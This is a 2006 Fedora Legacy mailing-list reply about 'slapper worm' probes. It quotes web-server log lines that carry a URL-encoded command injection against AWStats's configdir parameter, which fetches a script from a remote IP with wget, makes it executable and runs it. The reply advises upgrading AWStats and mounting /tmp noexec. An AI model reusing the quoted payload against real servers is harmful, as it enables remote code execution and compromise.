slapper worm
Kelson
kelson at speed.net
Mon Jan 23 21:45:22 UTC 2006
Michael Mansour wrote:
> 220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] "GET
> /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
> mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|
> HTTP/1.1"
> 403 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
> 220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] "GET
> /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
> mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|
> HTTP/1.1"
> 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
...
> Are there any updates FL can do to any of the packages to fix/block
> slapper from an FC1 machine?
You might also want to make sure you're using a current version of
AWStats. IIRC this flaw was fixed in either 6.3 or 6.4, and the current
version is 6.5.
(If you don't have awstats.pl on your system, then these lines are just
probes and aren't relevant to your problem.)
More generally, I read advice somewhere that mounting /tmp with the
"noexec" option (and making any other temp directories symbolic links to
that one) can make this type of attack much more difficult.
--
Kelson Vibber
SpeedGate Communications <www.speed.net>
More information about the fedora-legacy-list
mailing list